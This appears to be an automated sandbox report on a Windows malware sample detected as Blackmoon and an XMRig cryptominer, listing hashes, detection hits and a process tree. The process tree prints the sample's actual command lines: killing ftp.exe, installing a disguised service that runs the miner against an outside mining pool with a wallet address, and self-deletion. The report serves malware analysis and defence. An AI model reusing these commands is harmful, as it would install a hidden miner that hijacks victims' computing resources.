Analysis
-
max time kernel
148s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
18-05-2024 20:15
Behavioral task
behavioral1
Sample
56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe
Resource
win7-20240215-en
General
-
Target
56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe
-
Size
3.4MB
-
MD5
56967654bccafc5fe7bcfc649134c1b0
-
SHA1
536a3c80f0fd24c06ba09a137775d6fff7752a47
-
SHA256
782447e2740c78068a02e88f56f4ee2150116b7c182a96c9ca5a64ea1722062d
-
SHA512
a21250ac8134c3bbf79fe7d6352567c06532939ca88457606918a2d2ecc7029ded669535b88684e8205f9dfab8328253cc2da9496f6205f4a8d26c6c7124cb92
-
SSDEEP
98304:Se8KlkOGyXa8b2SLXUcd1r6mrPjyM8bOV1vXTsDxJzJmsLHJ:yInlb2OImjn5spNTJ
Malware Config
Signatures
-
Detect Blackmoon payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/1372-1-0x0000000000400000-0x0000000000FBB000-memory.dmp family_blackmoon behavioral2/memory/1372-9-0x0000000000400000-0x0000000000FBB000-memory.dmp family_blackmoon behavioral2/memory/1372-24-0x0000000000400000-0x0000000000FBB000-memory.dmp family_blackmoon -
XMRig Miner payload 16 IoCs
Processes:
resource yara_rule behavioral2/memory/1372-1-0x0000000000400000-0x0000000000FBB000-memory.dmp xmrig behavioral2/memory/1372-9-0x0000000000400000-0x0000000000FBB000-memory.dmp xmrig C:\Users\Admin\AppData\Local\Temp\System xmrig behavioral2/memory/4280-18-0x0000000000400000-0x0000000000931000-memory.dmp xmrig behavioral2/memory/4280-20-0x0000000000400000-0x0000000000931000-memory.dmp xmrig behavioral2/memory/1372-24-0x0000000000400000-0x0000000000FBB000-memory.dmp xmrig behavioral2/memory/4280-25-0x0000000000400000-0x0000000000931000-memory.dmp xmrig behavioral2/memory/4280-26-0x0000000000400000-0x0000000000931000-memory.dmp xmrig behavioral2/memory/4280-27-0x0000000000400000-0x0000000000931000-memory.dmp xmrig behavioral2/memory/4280-28-0x0000000000400000-0x0000000000931000-memory.dmp xmrig behavioral2/memory/4280-29-0x0000000000400000-0x0000000000931000-memory.dmp xmrig behavioral2/memory/4280-30-0x0000000000400000-0x0000000000931000-memory.dmp xmrig behavioral2/memory/4280-31-0x0000000000400000-0x0000000000931000-memory.dmp xmrig behavioral2/memory/4280-32-0x0000000000400000-0x0000000000931000-memory.dmp xmrig behavioral2/memory/4280-33-0x0000000000400000-0x0000000000931000-memory.dmp xmrig behavioral2/memory/4280-34-0x0000000000400000-0x0000000000931000-memory.dmp xmrig -
Executes dropped EXE 7 IoCs
Processes:
Process.exeProcess.exeProcess.exeProcess.exeProcess.exeProcess.exeSystempid process 3576 Process.exe 3676 Process.exe 4108 Process.exe 1428 Process.exe 2468 Process.exe 3976 Process.exe 4280 System -
Processes:
resource yara_rule behavioral2/memory/1372-0-0x0000000000400000-0x0000000000FBB000-memory.dmp upx behavioral2/memory/1372-1-0x0000000000400000-0x0000000000FBB000-memory.dmp upx behavioral2/memory/1372-9-0x0000000000400000-0x0000000000FBB000-memory.dmp upx behavioral2/memory/1372-24-0x0000000000400000-0x0000000000FBB000-memory.dmp upx -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 3696 taskkill.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
taskkill.exeSystemdescription pid process Token: SeDebugPrivilege 3696 taskkill.exe Token: SeLockMemoryPrivilege 4280 System -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exepid process 1372 56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.execmd.exeProcess.exedescription pid process target process PID 1372 wrote to memory of 3616 1372 56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe cmd.exe PID 1372 wrote to memory of 3616 1372 56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe cmd.exe PID 1372 wrote to memory of 3616 1372 56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe cmd.exe PID 3616 wrote to memory of 3584 3616 cmd.exe PING.EXE PID 3616 wrote to memory of 3584 3616 cmd.exe PING.EXE PID 3616 wrote to memory of 3584 3616 cmd.exe PING.EXE PID 1372 wrote to memory of 3696 1372 56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe taskkill.exe PID 1372 wrote to memory of 3696 1372 56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe taskkill.exe PID 1372 wrote to memory of 3696 1372 56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe taskkill.exe PID 1372 wrote to memory of 3576 1372 56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe Process.exe PID 1372 wrote to memory of 3576 1372 56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe Process.exe PID 1372 wrote to memory of 3676 1372 56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe Process.exe PID 1372 wrote to memory of 3676 1372 56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe Process.exe PID 1372 wrote to memory of 4108 1372 56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe Process.exe PID 1372 wrote to memory of 4108 1372 56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe Process.exe PID 1372 wrote to memory of 1428 1372 56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe Process.exe PID 1372 wrote to memory of 1428 1372 56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe Process.exe PID 1372 wrote to memory of 2468 1372 56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe Process.exe PID 1372 wrote to memory of 2468 1372 56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe Process.exe PID 3976 wrote to memory of 4280 3976 Process.exe System PID 3976 wrote to memory of 4280 3976 Process.exe System PID 1372 wrote to memory of 664 1372 56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe cmd.exe PID 1372 wrote to memory of 664 1372 56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe cmd.exe PID 1372 wrote to memory of 664 1372 56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1372 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ping 114.114.114.1142⤵
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Windows\SysWOW64\PING.EXEping 114.114.114.1143⤵
- Runs ping.exe
PID:3584 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ftp.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3696 -
C:\Users\Admin\AppData\Local\Temp\Process.exe"C:\Users\Admin\AppData\Local\Temp\Process.exe" stop FaxSeviceS2⤵
- Executes dropped EXE
PID:3576 -
C:\Users\Admin\AppData\Local\Temp\Process.exe"C:\Users\Admin\AppData\Local\Temp\Process.exe" remove FaxSeviceS confirm2⤵
- Executes dropped EXE
PID:3676 -
C:\Users\Admin\AppData\Local\Temp\Process.exe"C:\Users\Admin\AppData\Local\Temp\Process.exe" install FaxSeviceS "C:\Users\Admin\AppData\Local\Temp\System"2⤵
- Executes dropped EXE
PID:4108 -
C:\Users\Admin\AppData\Local\Temp\Process.exe"C:\Users\Admin\AppData\Local\Temp\Process.exe" set FaxSeviceS AppParameters -a cryptonight -o stratum+tcp://pool.supportxmr.com:5555 -u 47BoNDRZPB9VZ6fHZvHJUvFGV7J76d6zxPAP9Z5K879EKMLD4cecEnKJsH2FHBwgZwaFahLPKCaBtPcCEt4wmePo2VwXKgy -p xin --max-cpu-usage 80 --donate-level 12⤵
- Executes dropped EXE
PID:1428 -
C:\Users\Admin\AppData\Local\Temp\Process.exe"C:\Users\Admin\AppData\Local\Temp\Process.exe" start FaxSeviceS2⤵
- Executes dropped EXE
PID:2468 -
C:\Windows\SysWOW64\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\56967654bccafc5fe7bcfc649134c1b0_JaffaCakes118.exe"2⤵PID:664
-
C:\Users\Admin\AppData\Local\Temp\Process.exeC:\Users\Admin\AppData\Local\Temp\Process.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3976 -
C:\Users\Admin\AppData\Local\Temp\System"C:\Users\Admin\AppData\Local\Temp\System" -a cryptonight -o stratum+tcp://pool.supportxmr.com:5555 -u 47BoNDRZPB9VZ6fHZvHJUvFGV7J76d6zxPAP9Z5K879EKMLD4cecEnKJsH2FHBwgZwaFahLPKCaBtPcCEt4wmePo2VwXKgy -p xin --max-cpu-usage 80 --donate-level 12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4280
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
360KB
MD51136efb1a46d1f2d508162387f30dc4d
SHA1f280858dcfefabc1a9a006a57f6b266a5d1fde8e
SHA256eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848
SHA51243b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5
-
Filesize
5.1MB
MD5ca6e129ab95d5e2d1faebddb224e4a79
SHA1cdda703f24235a92b7963c7f18e944e32a4be23f
SHA2563740d118e0d91c1c27d7c36173e14143a0be294a08771d6aa1c2f3e996487f21
SHA512096221b68bf193492312ad7d61abfacc81ff3df30bb59fb57cbf5e2764499a4e51155811a4a6c6bbbd197eb70a0303ba06d2276eb7f4f2ebc449d0461261a5dd